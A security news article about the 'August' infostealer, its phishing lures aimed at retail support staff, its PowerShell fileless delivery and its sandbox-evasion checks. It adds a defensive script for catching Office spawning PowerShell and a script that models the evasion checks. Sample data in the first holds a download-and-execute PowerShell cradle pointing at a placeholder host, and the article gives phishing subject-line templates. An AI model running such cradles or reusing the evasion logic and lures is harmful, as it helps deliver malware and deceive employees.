
In November 2016, a cyber-crime group started deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected computer.

The crooks have used August in highly targeted spear-phishing attacks aimed at customer service and managerial staff at various retailers, according to US security firm Proofpoint, which first uncovered the attacks and the August malware.

The same technique of targeting customer support representatives was also observed in the past month by security researchers from Trustwave, who reported seeing the Carbanak gang use it to infect two companies in the hospitality field and a restaurant chain.

Attackers pose as disgruntled customers

According to Proofpoint, behind the August malware stands a long-lived and experienced cyber-crime group tracked under the codename TA530.

This threat actor has been extremely busy in the past year, targeting high-level executives with carefully personalized spear-phishing emails, usually put together using data gathered from LinkedIn and other sources.

Now the group has started shipping August, which in functional terms is a mundane infostealer, but a newly written one rather than a rebranded old family.

For this campaign, TA530 has been using spam emails disguised as customer complaints. Some of the subject lines allude to errors in orders, exactly the kind of issue a customer support rep is expected to investigate, which is why recipients often end up opening the attached file. Some of the cleverly crafted subject lines are:

  • Erroneous charges from [recipient’s domain]
  • [recipient’s domain] - Help: Items vanish from the cart before checkout
  • [recipient’s domain] Support: Products disappear from the cart during checkout
  • Need help with order on [recipient’s domain]
  • Duplicate charges on [recipient’s domain]

A sample of the email the victims receive is also embedded below.

Email received by August victims [Source: Proofpoint]

In all cases, the attached file is a Word document containing a malicious macro. Proofpoint's analysis of this file showed that the macro, if the tricked victim allows it to run, launches a PowerShell script that downloads the malware and loads it "filelessly" into the victim's computer memory, without writing the payload to disk. Because nothing lands on disk, file-based antivirus has little to scan; the Office process spawning PowerShell, and the PowerShell command line itself, are where the infection is visible.
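As an added illustration of how a defender would catch this delivery chain, not code from the article or from Proofpoint: the script below runs over constructed process-creation records shaped like Sysmon Event ID 1 fields (sample data invented for the example) and alerts whenever an Office application spawns PowerShell, scoring the command line for download-cradle traits and decoding any `-EncodedCommand` argument so the hidden payload is inspected too. The indicator list and field names are the author's assumptions, not anything attributed to August.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed, simplified process-creation records in the shape of Sysmon
# Event ID 1 fields. Made-up sample data for the example, not telemetry from
# the August campaign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Word spawning PowerShell with an encoded command ("SQBFAFgA" is UTF-16LE "IEX")
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA",
    },
    {   # Word spawning PowerShell with a plaintext download-and-execute cradle
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')\"",
    },
    {   # Benign: an admin running a script from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
    },
    {   # Benign: Word spawning the print spooler helper
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")

# Command-line traits of a download-and-run-in-memory cradle (assumed list).
# Each is weak alone; the combination with an Office parent makes the alert.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\b", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b", re.I)),
    ("in_memory_exec", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("webclient", re.compile(r"net\.webclient", re.I)),
    ("hidden_window", re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("exec_bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I)),
    ("base64_decode", re.compile(r"frombase64string", re.I)),
]
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def matched_indicators(text: str) -> List[str]:
    return [name for name, rx in INDICATORS if rx.search(text)]


def score_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert for an Office process spawning PowerShell, else None."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return None
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    found = set(matched_indicators(cmdline))
    if decoded:
        found |= set(matched_indicators(decoded))  # inspect the hidden payload as well
    return {
        "parent": basename(event["ParentImage"]),
        "decoded_command": decoded,
        "indicators": sorted(found),
        "score": len(found),
    }


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [a for a in (score_event(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The Office-parent/PowerShell-child pairing is the high-signal part; the indicator score only orders alerts for triage. Decoding the encoded argument matters because a bare `-EncodedCommand` hides every other keyword from a plain string match.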

August employs advanced anti-detection techniques

Despite being a simple first-stage infostealer, August uses several advanced sandbox-evasion techniques, some of which were first documented only in the past three months.

These checks include scanning for recently opened files, counting local processes, inspecting task names, and looking up the victim's IP address through the MaxMind IP-geolocation API.

The purpose of these checks is to tell whether the malware is running inside an analysis virtual machine or on a real user's computer. If it finds fewer than three recently opened files, very few running processes, task names hinting at reverse-engineering tools, or an IP address belonging to a well-known data center, the malware aborts, concluding that a researcher is trying to analyze it. The practical consequence for defenders is that a freshly provisioned, cloud-hosted sandbox with a monitoring tool running will never see August's second stage.
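To show what an analysis VM has to look like to get past these checks, here is an added example (the author's code, not August's and not Proofpoint's) that evaluates the four checks the article describes against two constructed host snapshots: a bare cloud sandbox and a workstation "dressed" to resemble a support rep's machine. The tool-name list, the data-center organisation list, the process-count threshold and the GeoIP2-style response fields are all assumptions made for the example; only the "fewer than three recent files" threshold comes from the article.

```python
from dataclasses import dataclass
from typing import Dict, List

# Process names treated as analysis tooling or VM guest agents. Illustrative
# list chosen for the example; the article does not publish August's own list.
ANALYSIS_TOOL_NAMES = {
    "procmon.exe", "procmon64.exe", "procexp.exe", "procexp64.exe", "wireshark.exe",
    "fiddler.exe", "ollydbg.exe", "x32dbg.exe", "x64dbg.exe", "ida.exe", "ida64.exe",
    "windbg.exe", "regshot.exe", "pestudio.exe", "vboxservice.exe", "vmtoolsd.exe",
}
# Hosting and cloud providers whose address space marks a host as a data-center
# machine rather than a retail workstation. Also illustrative.
DATACENTER_ORGS = {"amazon", "google", "microsoft", "digitalocean", "ovh", "hetzner", "linode"}

MIN_RECENT_FILES = 3     # threshold the article attributes to August: fewer than three aborts
MIN_PROCESS_COUNT = 30   # assumed value; the article only says "very few"


@dataclass
class HostSnapshot:
    """What the malware can observe about the machine it landed on."""
    recent_files: int           # entries in the user's Recent Items folder
    process_names: List[str]    # image names from the process list
    public_ip_org: str          # organisation behind the public IP, per a geolocation lookup


def org_from_geoip_response(resp: Dict) -> str:
    """Pull the organisation string out of a GeoIP2-style JSON response.
    The 'traits' field names are an assumption about the lookup service."""
    traits = resp.get("traits", {})
    return (traits.get("organization") or traits.get("isp")
            or traits.get("autonomous_system_organization") or "")


def triggered_checks(snap: HostSnapshot) -> List[str]:
    """Return the reasons August-style logic would treat this host as a sandbox."""
    reasons: List[str] = []
    if snap.recent_files < MIN_RECENT_FILES:
        reasons.append(f"recent_files<{MIN_RECENT_FILES}")
    if len(snap.process_names) < MIN_PROCESS_COUNT:
        reasons.append(f"process_count<{MIN_PROCESS_COUNT}")
    tools = sorted({p.lower() for p in snap.process_names} & ANALYSIS_TOOL_NAMES)
    if tools:
        reasons.append("analysis_tools:" + ",".join(tools))
    org = snap.public_ip_org.lower()
    if any(dc in org for dc in DATACENTER_ORGS):
        reasons.append("datacenter_ip:" + snap.public_ip_org)
    return reasons


def would_abort(snap: HostSnapshot) -> bool:
    """True if any check fires; one hit is enough for the malware to bail out."""
    return bool(triggered_checks(snap))


# Constructed snapshots: a freshly provisioned cloud sandbox with a monitor
# running, and a workstation dressed to look like a support rep's machine.
CORE_PROCESSES = ["System", "smss.exe", "csrss.exe", "wininit.exe", "services.exe",
                  "lsass.exe", "winlogon.exe", "explorer.exe", "dwm.exe", "taskhostw.exe"]
BARE_SANDBOX = HostSnapshot(
    recent_files=0,
    process_names=CORE_PROCESSES + ["vmtoolsd.exe", "procmon64.exe", "WINWORD.EXE"],
    public_ip_org=org_from_geoip_response({"traits": {"organization": "Amazon.com, Inc."}}),
)
DRESSED_WORKSTATION = HostSnapshot(
    recent_files=27,
    process_names=CORE_PROCESSES + ["sihost.exe", "ctfmon.exe", "RuntimeBroker.exe",
                                    "SearchIndexer.exe", "spoolsv.exe", "OneDrive.exe",
                                    "chrome.exe", "outlook.exe", "WINWORD.EXE", "Teams.exe"]
                  + ["svchost.exe"] * 15,
    public_ip_org=org_from_geoip_response({"traits": {"isp": "Comcast Cable Communications, LLC"}}),
)

if __name__ == "__main__":
    for name, snap in (("bare sandbox", BARE_SANDBOX), ("dressed workstation", DRESSED_WORKSTATION)):
        print(f"{name}: abort={would_abort(snap)} reasons={triggered_checks(snap)}")
```

Run against a real VM, the same evaluator tells an analyst which of the four traits still gives the sandbox away. The data-center check is the hardest to satisfy from a cloud-hosted lab; the other three can be fixed by seeding Recent Items, running a realistic process load, and keeping monitoring tools out of the guest's process list.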

August is a top-shelf feature-packed infostealer

If none of these checks fires, August springs into action and carries out a series of actions that include:

  • Searching for specific file extensions and uploading the files to its C&C server.
  • Searching and stealing Bitcoin wallet information.
  • Searching and stealing cookies and passwords from browsers such as Firefox and Chrome.
  • Searching and stealing passwords from email clients such as Thunderbird and Outlook.
  • Searching and stealing credentials from FTP clients such as SmartFTP, FileZilla, TotalCommander, WinSCP, and CoreFTP.
  • Searching and stealing .rdp (Remote Desktop Protocol) configuration files.
  • Gathering local OS information, such as hardware ID, OS name, and username.

All this data is sent to a remote command and control (C&C) server, where it is accessible to TA530 members through a Web-based control panel. Proofpoint researchers managed to gain access to one of these panels, shown below.

August malware control panel, file search and exfiltration options [Source: Proofpoint]


August malware control panel, database with stolen information [Source: Proofpoint]

While August is a relatively new threat, the infostealer shows the same degree of sophistication and the same rich feature set seen in more mature threats such as Pony, Snifula, or CoreBot.

Its use of PowerShell for malicious purposes is also in line with a Symantec report released today, which found that 95.4% of the 111 malware families it examined employed Microsoft's PowerShell scripting language for malicious operations, such as downloading other malware or malware modules, or traversing a network in search of other valuable information.